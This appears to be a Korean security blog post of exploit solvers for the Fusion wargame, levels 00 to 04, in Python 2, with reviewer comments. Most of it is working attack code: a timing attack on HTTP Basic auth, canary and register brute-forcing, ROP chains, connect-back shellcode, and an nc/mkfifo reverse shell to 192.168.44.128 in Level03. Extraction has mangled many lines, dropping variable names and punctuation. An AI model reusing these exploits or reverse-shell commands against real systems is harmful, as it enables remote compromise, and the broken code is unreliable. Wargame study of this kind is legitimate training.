내가 더 공부해야 한다고 뼈저리게 느끼게 해준 Wargame이다.

stack이 망한다 할지라도 계속 더 공부를 해야겠다고 느꼈다.

rop 문제를 몇 문제 더 풀면서 heap 공부를 같이 해야겠다.


# Level04 solver as posted (Python 2: print statements, str-based sockets,
# base64.encodestring).  Stages, in the order written below: recover the HTTP
# Basic-auth password through a timing side channel, then brute-force the stack
# canary and a saved register one byte per connection, then send a ROP chain.
# Every stage relies on the remote values being identical across connections —
# TODO confirm (this holds for a forking server that never re-executes).
from socket import *
from struct import *
from telnetlib import *
import base64, time
 
# NOTE(review): the name on the left of this lambda (presumably `p`, which is
# used below for p(read), p(pppr), ...) was lost when the page was extracted.
= lambda x : pack('<L', x)
up = lambda x : unpack('<L', x)   # 4-byte little-endian unpack; returns a 1-tuple
pi = lambda x : pack('<I', x)     # same byte layout as the lambda above; unused below
 
HOST = "192.168.111.128"          # author's lab VM
PORT = 20004
 
# Get Password
# Candidate characters tried at each password position.  The upper-case run
# jumps from T to V as printed, so 'U' is never tried.
table = "ABCDEFGHIJKLMNOPQRSTVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
password = ""
 
for i in range(0x10) :            # 16 password characters
    for j in table :
        # One fresh connection per guess.  None of these sockets is closed
        # inside the loop; only the last one is closed after it.
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((HOST, PORT))
 
        stime = time.time()
 
        # encodestring() appends a trailing newline to its output (not stripped here).
        s.send("GET / HTTP/1.0\r\nAuthorization: Basic " + base64.encodestring(password + j) + "\r\n\r\n")
        s.recv(1024)
 
        etime = time.time()
 
        # Timing oracle: a guess is kept purely because the round trip took
        # under 2 ms.  Defensive note: a constant-time comparison on the server
        # removes this signal; a noisy network also makes the threshold unreliable.
        if(etime - stime) < 0.002 :
            password += j
            break
print "[*] Password : " + password
s.close()
 
# Get Canary
# Byte-at-a-time search: a candidate byte is kept when the reply does not
# contain the stack-protector abort text ("stack smashing").  This only works
# if the canary is the same for every connection — TODO confirm.
canary = ""
 
for i in range(4) :               # four canary bytes (32-bit target)
    for j in range(0x100) :
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((HOST, PORT))
 
        payload = password
        payload += "A" * 2032     # filler up to the canary slot (offset as given on the page)
        payload += canary         # bytes recovered so far
        payload += chr(j)         # byte under test
        # NOTE(review): presumably .replace("\n", "") — the comma looks lost in
        # extraction; as printed, replace() receives one argument and raises TypeError.
        payload = base64.encodestring(payload).replace("\n""")
 
        s.send("GET / HTTP/1.0\r\nAuthorization: Basic " + payload + "\r\n\r\n")
        check_string = s.recv(1024)
 
        if "stack smashing" not in check_string :
            canary += chr(j)
            break
print "[*] Canary : " + str(hex(up(canary)[0]))
s.close()
 
# Get Base Address
# Same byte-at-a-time scheme for the saved register that follows the canary;
# a byte is kept when the server still answers with a 200 status line.
ebx = ""
 
for i in range(4) :
    for j in range(0x100) :
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((HOST, PORT))
 
        payload = password
        payload += "A" * 2032
        payload += canary
        payload += "A" * 12       # gap between canary and the saved register (offset from the page)
        payload += ebx
        payload += chr(j)
        # NOTE(review): presumably .replace("\n", "") — see the note above.
        payload = base64.encodestring(payload).replace("\n""")
 
        s. send("GET / HTTP/1.0\r\nAuthorization: Basic " + payload + "\r\n\r\n")
 
        # A bare except: any recv() failure (e.g. reset connection) counts as
        # "no 200 reply" for this byte.
        try :
            check_string = s.recv(1024)
        except :
            check_string = ""
 
        if "HTTP/1.0 200 Ok" in check_string :
            ebx += chr(j)
            break
print "[*] EBX : " + hex(up(ebx)[0])
s.close()
 
# NOTE(review): the names on the left of the next two assignments (presumably
# `s` and `t`, judging by s.connect / t.sock below) were lost in extraction.
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST ,PORT))
= Telnet()
t.sock = s                        # reuse the raw socket for Telnet.interact() below
 
# NOTE(review): presumably up(ebx)[0] - 0x4118 — the closing ']' is missing as printed.
# All offsets below are the author's constants for this specific binary/libc build;
# they are meaningless for any other build.
base_addr = up(ebx)[0- 0x4118
libc_base = base_addr - 0x1a9000
 
read = base_addr + 0xd20
system = libc_base + 0x3cb20
pppr = base_addr + 0x19ba         # pop;pop;pop;ret — cleans three arguments off the stack
bss = base_addr + 0x4240 + 0x300  # writable scratch area used as a destination buffer
 
s.send("GET / HTTP/1.0\r\n")      # request line only; the header line is sent later
 
cmd = "/bin/sh\x00"               # NUL-terminated; len(cmd) == 8 is used as a length below
 
payload = password
payload += "A" * 2032
payload += canary
payload += "A" * 12
payload += ebx
payload += "A" * 12
# Chain as laid out: read(0, bss, len(cmd)) with pppr as its return address,
# then system(bss) with "AAAA" standing in for system's return address.
payload += p(read)
payload += p(pppr)
payload += p(0)
payload += p(bss)
payload += p(len(cmd))
 
payload += p(system)
payload += "AAAA"
payload += p(bss)
 
# NOTE(review): presumably .replace("\n", "") — see the note above.
payload = base64.encodestring(payload).replace("\n""")
 
s.send("Authorization: Basic " + payload + "\r\n")
 
s.send("/bin/sh\x00")             # the bytes consumed by the read() call in the chain
 
t.interact()



[Fusion] Level03


# Level03 solver as posted (Python 2).  Builds a ROP chain, embeds it in the
# "title" field of a JSON request, then searches for a 4-character nonce whose
# HMAC-SHA1 (keyed with the token the server sent first) begins with "0000",
# and sends that request.
from socket import *
from struct import *
import hmac
import hashlib
import itertools
 
# NOTE(review): the lambda's name (presumably `p`, used below) was lost in extraction.
= lambda x: pack('<L', x)
 
HOST = "192.168.111.131"          # author's lab VM
PORT = 20003
 
# NOTE(review): presumably `s = socket(...)`; the name was lost in extraction.
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"  # nonce alphabet
# NOTE(review): the commas separating the four addresses were lost in extraction
# (presumably [0x804858b, 0x804858c, 0x804bbb5, 0x80482a4]).
gadget = [0x804858b0x804858c0x804bbb50x80482a4]
# Author's absolute addresses for this binary (fixed addresses, i.e. no PIE — TODO confirm).
memcpy_plt = 0x8048e60
rand_got = 0x804bd98
pppr = 0x804a26d
popebpret = 0x804a26f
pop_ebx = 0x8049402
pop_eax = 0x8049b4f
add_ebx = 0x80493f9
leaveret = 0x8049431
bss = 0x804bdf4
offset = 0xf7fbd6cc
token = s.recv(1024)[1:-2]        # drops the first byte and the last two of the banner — TODO confirm framing
 
attack = ""
attack += p(pop_eax)
attack += p(offset)
attack += "A" * 0x5c
attack += p(pop_ebx)
# NOTE(review): presumably (rand_got - 0x5d5b04c4) & 0xffffffff — a ')' is missing as printed.
attack += p((rand_got - 0x5d5b04c4& 0xffffffff)
attack += "AAAA"
attack += p(add_ebx)
 
# NOTE(review): presumably range(0, 4) — the comma was lost in extraction.
# Each iteration queues one memcpy_plt call (three arguments, cleaned by pppr).
for i in range(04):
    attack += p(memcpy_plt)
    attack += p(pppr)
    attack += p(bss - i - 5)
    attack += p(gadget[i])
    # NOTE(review): this literal looks mangled by the page rendering; presumably
    # a 4-byte little-endian length argument — confirm against the original post.
    attack += "\\\\u0100\\\\u0000"
 
attack += p(popebpret)
attack += p(bss - 12)
attack += p(leaveret)             # looks like a stack pivot into bss — TODO confirm
 
payload = 'A' * 123
# NOTE(review): likewise mangled by rendering; presumably two literal bytes.
payload += "\\\\u4242"
payload += "A" * 31
payload += attack
 
# Proof-of-work search: every 4-character nonce is tried until the keyed
# HMAC-SHA1 of the whole message starts with "0000".  `hash` shadows the
# builtin of the same name.  The command text is left exactly as on the page.
for col in itertools.product(table, repeat=4) :
    realpayload = token + "\n"
    realpayload += '{"contents":"mkfifo /tmp/han3l; nc 192.168.44.128 12345 0< /tmp/han3l | /bin/sh 1> /tmp/han3l;", '
    realpayload += '"title":"' + ''.join(col) + payload + '", '
    realpayload += '"serverip":"192.168.44.128:12345"}'
    hash = hmac.new(token, realpayload, hashlib.sha1)
    # NOTE(review): presumably [:4] == "0000" — the ']' is missing as printed.
    if hash.hexdigest()[:4== "0000":
        print "[*]Find : " + realpayload
        print "[*]hash : " + hash.hexdigest()
        break
 
# No exhaustion check: if no nonce matched, the last candidate is sent anyway.
s.send(realpayload)
s.close()



[Fusion] Level02.


# Level02 solver as posted (Python 2).  Sends an all-zero buffer so the reply
# discloses the service's XOR key, XORs the payload with that key and sends it
# back.  Defensive note: a keystream the peer can recover by sending zeros
# provides no confidentiality at all.
from struct import *
from socket import *
from telnetlib import *
 
# NOTE(review): presumably `p = lambda ...`; the name was lost in extraction.
= lambda x : pack('<I', x)
 
HOST = "192.168.111.131"          # author's lab VM
PORT = 20002
 
# NOTE(review): presumably `s = socket(...)` and `t = Telnet()` (see s.connect / t.sock).
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
= Telnet()
t.sock = s                        # reuse the raw socket for Telnet.interact() below
 
# NOTE(review): presumably "E" + p(128) + "\x00" * 128 — a ')' is missing as printed.
# 128 zero bytes: presumably the service echoes the buffer XORed with its key,
# so the echo is the key itself — TODO confirm.
s.send("E" + p(128+ "\x00" * 128)
s.recv(1024)
key = s.recv(1024)[-0x80:]        # the last 128 bytes of the reply are taken as the key
print "[*] Get xor key"
 
payload = "A" * 0x20010           # filler (offset as given on the page)
# Author's absolute addresses for this binary; not labelled on the page.
payload += p(0x8048860)
payload += p(0x80499bd)
payload += p(0)
payload += p(0x804b420)
payload += p(8)
payload += p(0x80489b0)
payload += "AAAA"
payload += p(0x804b420)
payload += p(0)
payload += p(0)
 
realpayload = ""
# NOTE(review): presumably range(0, len(payload)) — the comma was lost in extraction.
for i in range(0len(payload)) :
    realpayload += chr(ord(payload[i]) ^ ord(key[i % 128]))   # key repeats every 128 bytes
 
s.send("E" + p(len(realpayload)) + realpayload + "Q")
s.send("/bin/sh\x00")             # bytes consumed after the payload — TODO confirm which read takes them
 
t.interact()



[Fusion] Level01


# Level01 solver as posted (Python 2).  Stack overflow through the HTTP request
# line: NOP sled, the address of a jmp-esp gadget, a second sled, shellcode.
# Unlike a hard-coded stack address, returning into a gadget in the binary does
# not depend on the stack's position; it still depends on the binary not being
# randomised and on an executable stack — TODO confirm those assumptions.
from struct import *
from socket import *
 
# NOTE(review): presumably `p = lambda ...`; the name was lost in extraction.
= lambda x: pack('<L', x)
 
# Raw x86 machine-code bytes, copied from the page as-is; not decoded here.
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
             "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
             "\x01\x6a\x02\x89\xe1\xcd\x80\x89"
             "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
             "\xc0\xa8\x2c\x80\x66\x68\x30\x39\x66\x53\xfe"
             "\xc3\x89\xe1\x6a\x10\x51\x56\x89"
             "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
             "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
             "\xc0\x52\x68\x6e\x2f\x73\x68\x68"
             "\x2f\x2f\x62\x69\x89\xe3\x52\x53"
             "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
             "\x80")
 
HOST = "192.168.111.131"          # author's lab VM
PORT = 20001
jmp_esp = 0x08049f4f              # author's gadget address for this binary
 
# NOTE(review): presumably `s = socket(...)`; the name was lost in extraction.
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
print "Making Exploit Code..."
 
payload = ""
payload += "GET "
payload += "\x90" * 139           # filler up to the saved return address (offset from the page)
payload += p(jmp_esp)
payload += "\x90" * 100           # sled that execution lands in after the gadget
payload += shellcode
payload += " HTTP/1.1"
 
print "Sending Exploit Code..."
s.send(payload)
s.close()                         # no reply is read; the script ends here



[Fusion] Level00


# Level00 solver as posted (Python 2).  Stack overflow through the HTTP request
# line with a hard-coded stack address: NOP sled, the address, a shorter sled,
# shellcode.  The fixed address only makes sense without ASLR and for the
# author's exact environment; any stack-layout change breaks it.
from struct import *
from socket import *
 
# NOTE(review): presumably `p = lambda ...`; the name was lost in extraction.
= lambda x: pack('<L', x)
 
# Raw x86 machine-code bytes, copied from the page as-is; not decoded here.
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
             "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
             "\x01\x6a\x02\x89\xe1\xcd\x80\x89"
             "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
             "\xc0\xa8\x2c\x80\x66\x68\x30\x39\x66\x53\xfe"
             "\xc3\x89\xe1\x6a\x10\x51\x56\x89"
             "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
             "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
             "\xc0\x52\x68\x6e\x2f\x73\x68\x68"
             "\x2f\x2f\x62\x69\x89\xe3\x52\x53"
             "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
             "\x80")
 
HOST = "192.168.111.131"          # author's lab VM
PORT = 20000
 
# NOTE(review): presumably `s = socket(...)`; the name was lost in extraction.
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
print "Sending Exploit Code..."
 
payload = ""
payload += "GET "
payload += "\x90" * 139           # filler up to the saved return address (offset from the page)
payload += p(0xbfd98a48 + 150)    # author's observed stack address, nudged 150 bytes into the sled
payload += "\x90" * 30
payload += shellcode
payload += " HTTP/1.1"
 
print payload                     # dumps the raw (binary) request to stdout
 
s.send(payload)
s.close()                         # no reply is read; the script ends here


